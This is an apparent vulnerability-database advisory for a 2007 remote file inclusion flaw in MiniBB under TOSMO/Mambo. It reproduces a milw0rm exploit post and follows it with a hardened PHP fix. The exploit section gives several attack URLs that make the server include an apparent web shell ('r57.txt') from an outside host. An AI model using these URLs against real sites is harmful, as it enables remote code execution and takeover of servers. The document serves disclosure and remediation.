TOSMO/Mambo absolute_path Parameter Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1112688    Vulnerability type: Input validation
Published: 2007-04-11    Updated: 2007-04-27
CVE: CVE-2007-2317    CNNVD ID: CNNVD-200704-521
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/3707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-521
|Vulnerability Details
Multiple PHP remote file inclusion vulnerabilities exist in MiniBBForum, as used in TOSMO/Mambo and possibly other products. A remote attacker can execute arbitrary PHP code by submitting a URL in the absolute_path parameter to bb_plugins.php in (1) components/minibb/ or (2) components/com_minibb, or to (3) configuration.php.
|Vulnerability EXP
=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-11]
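The root cause shown in the advisory above is an include() whose base path, $absolute_path, is never assigned in the included file, so with register_globals enabled a request parameter supplies it. The following is an added example (not code from the original advisory, nor from the Mambo or MiniBB code bases) that places that pattern beside one hardened version; it assumes the file sits in <mambo root>/components/ and that _VALID_MOS is the constant Mambo's own entry point defines.

```php
<?php
// Added example, not the original project's code.
//
// Vulnerable pattern quoted in the advisory: $absolute_path is not set in
// this file, so register_globals=On lets ?absolute_path=http://... supply
// it, and include() fetches and runs remote code (allow_url_include
// permitting).
//
//   include("$absolute_path/components/minibb/bb_admin.php");
//
// Hardened version below. Server-side settings that also close this class
// of bug: register_globals=Off (removed entirely in PHP 5.4) and
// allow_url_include=Off, so include() never dereferences a URL.

// 1. Refuse direct requests: only Mambo's entry point defines _VALID_MOS
//    (assumption: the constant used by the host application).
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Fixed base directory derived from this file's own location, never from
//    request data (assumption: this file lives in <root>/components/).
$absolute_path = dirname(__DIR__);

// 3. Resolve the target and confirm it still lies under the base directory,
//    so neither a URL nor a ../ sequence can escape the application root.
function safe_include(string $base, string $relative): void
{
    $real_base = realpath($base);
    $target    = realpath($base . '/' . $relative);
    if ($real_base === false || $target === false
        || strncmp($target, $real_base . DIRECTORY_SEPARATOR,
                   strlen($real_base) + 1) !== 0) {
        http_response_code(500);
        exit('Include path resolved outside the application root');
    }
    include $target;
}

safe_include($absolute_path, 'components/minibb/bb_admin.php');
```

realpath() returns false for a remote URL or a non-existent file, so a request-controlled value can no longer reach include() at all.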
|References

Source: XF
Name: tosmomambo-absolutepath-file-include(33578)
Link: http://xforce.iss.net/xforce/xfdb/33578
Source: BID
Name: 23416
Link: http://www.securityfocus.com/bid/23416
Source: MILW0RM
Name: 3707
Link: http://www.milw0rm.com/exploits/3707
Source: VUPEN
Name: ADV-2007-1354
Link: http://www.frsirt.com/english/advisories/2007/1354
Source: VIM
Name: 20070413 Dup: TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
Link: http://www.attrition.org/pipermail/vim/2007-April/001518.html
Source: OSVDB
Name: 35762
Link: http://osvdb.org/35762
Source: OSVDB
Name: 35761
Link: http://osvdb.org/35761